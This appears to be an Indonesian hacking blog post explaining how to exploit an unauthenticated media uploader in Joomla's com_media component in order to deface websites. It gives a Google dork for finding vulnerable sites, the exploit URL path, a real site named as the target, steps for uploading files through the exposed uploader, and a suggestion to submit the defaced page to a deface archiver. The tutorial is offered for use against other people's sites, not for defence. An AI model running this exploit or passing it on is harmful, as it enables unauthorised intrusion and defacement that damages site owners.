Berhubung udah banyak banget yang share, jadi saya juga ga mau ketinggalan,, hehehe Nah, topic kali ini membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla.. :) pada penasaran gimana caranya? so easy kok :)
Dork : inurl:com_media site:com
Exploit: /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Pertama sobat cari dah targetnya dulu di google dengan memanfaatkan dork diatas, dan kalo bisa dork tersebut dikembangkan lagi yah, biar bisa nemu target yang fresh :)
Disini saya sudah menemukan tergetnya : http://www.rivit.ca
Nah, sekarang kita tambahin aja exploitnya, jadinya begini:
http://www.rivit.ca/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
maka akan terlihat seperti gambar berikut:
Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian uploader..
Note: file yang bisa diupload berextensi .txt .jpg .gif .png. Untuk html dan php tidak bisa.
kalo berhasil, akan muncul keterangan seperti berikut:
Nah, untuk melihat hasil file yang sudah kita upload di sini: site.com/images/file
cth: http://www.rivit.ca/images/idca.txt
lihat hasil file yang sudah saya upload tadi :) tinggal Submit aja di deface archiver :p
Sip, segitu aja artikel yang bisa berikan kali ini, mudah2an bermanfaat :)
Content Creator: HADES
.jpg "Koi Mil Gaya.2003.DVDRip.Bahasa Indonesia Include")
Warning !!!
=> Mohon memberikan komentar yang sopan dan ramah,
=> YOKO LIEM berhak menghapus komentar spam, komentar yang berisi link, atau komentar yang tidak senonoh,
=> YOKO LIEM sangat menghargai keramahan komentar Anda,
=> YOKO LIEM akan berusaha untuk menanggapi komentar Anda dan mengunjungi balik,
Terima kasih sudah berkunjung ^_^
`````Jika anda tidak belajar mencintai diri sendiri terlebih dahulu anda tidak bisa mencintai orang lain`````